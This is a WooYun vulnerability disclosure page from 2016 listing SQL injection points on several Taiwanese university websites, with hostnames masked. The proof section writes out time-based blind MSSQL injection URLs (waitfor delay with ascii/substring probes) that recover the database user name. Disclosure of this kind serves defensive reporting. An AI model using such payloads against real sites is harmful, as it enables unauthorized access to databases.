当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168524

漏洞标题:台湾多个大學SQL注入漏洞打包(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 404notfound

提交时间:2016-01-09 23:16

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-09: 细节已通知厂商并且等待厂商处理中
2016-01-10: 厂商已经确认,细节仅向厂商公开
2016-01-20: 细节向核心白帽子及相关领域专家公开
2016-01-30: 细节向普通白帽子公开
2016-02-09: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

rt,求大神告知怎么破python脚本中mssql出现的错误

详细说明:

0x01
注入点:http://**.**.**.**/detail.php?articleId=50101
参数articleID可延时注入
0x02
台湾省佛光科技大学
http://**.**.**.**/news2.php?fid=9&pg_no=789
参数pg_no可延时注入绕过waf
0x03
注入点:http://**.**.**.**/2013/epaper/4c.php?id=54&aid=500
0x04
http://**.**.**.**/main/focus.php?aid=16

漏洞证明:

一个为例证明
注入点:http://**.**.**.**/naidice/course_detail.aspx?iid=2133
参数iid可延时注入
又遇到python脚本不能跑mssql的情况
还未找到解决方法,回头再去研究下lijiejie的脚本,现在只有手工
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20len%28user%29=3%20waitfor%20delay%20%270:0:2%27-- TRUE user长度为3
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20ascii%28substring%28user,1,1%29%29=100%20waitfor%20delay%20%270:0:2%27-- TRUE user第一位为d
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20ascii%28substring%28user,2,1%29%29=98%20waitfor%20delay%20%270:0:2%27-- TRUE user第二位为b
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20ascii%28substring%28user,3,1%29%29=111%20waitfor%20delay%20%270:0:2%27--
TRUE user第三位为o
user为dbo

修复方案:

过滤

版权声明:转载请注明来源 404notfound@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-10 21:26

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-10 00:06 | 404notfound ( 普通白帽子 | Rank:259 漏洞数:71 | 考研中,有事请留言)

    我靠,不知不觉4个注入点又被川哥打包了,我真不是刷rank的。只是发现一个就提交了,提交完了后又发现了其他的,求20